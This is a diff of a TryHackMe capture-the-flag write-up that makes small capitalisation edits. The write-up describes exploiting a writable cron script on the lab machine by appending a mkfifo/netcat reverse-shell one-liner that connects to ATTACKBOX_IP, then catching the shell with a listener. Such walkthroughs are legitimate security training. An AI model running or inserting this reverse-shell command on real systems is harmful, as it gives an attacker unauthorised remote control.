RawBoeuf/thm-ctf-writeups/writeups/EasyPeasy.md

 ![crontab](/resources/easypeasy/crontab.png)

 It looks like there's a bash file in `/var/www/` that gets run periodically specifically every minute.
 This looks like the cronjob vulnerability that we were looking for.
-I run nano on it using `nano /var/www/.mysecretcronjob.sh` since vim isn't installed on the machine and find that it is indeed writable.
+I run nano on it using `nano /var/www/.mysecretcronjob.sh` since Vim isn't installed on the machine and find that it is indeed writable.
 Eureka.

 Now for some exploiting.
-We'll be setting up a Reverse Shell using netcat.
+We'll be setting up a Reverse Shell using Netcat.
 To do that, we'll need to add this line `rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKBOX_IP 4444 >/tmp/f` to the `.mysecretcronjob.sh` file.
 Along with running the command `netcat -lvnp 4444` on our own machine, we'll have our reverse shell up and running the next time this cronjob is run.
 For more detailed breakdown of the commands click [here](/writeups/EasyPeasy.md#cronjob-detailed-breakdown).

-After a bit of waiting, this is what I received on my netcat listener.
+After a bit of waiting, this is what I received on my Netcat listener.
 I ran whoami to make sure it was working properly.

 ![Reverse Shell Success](/resources/easypeasy/netcatlisten.png)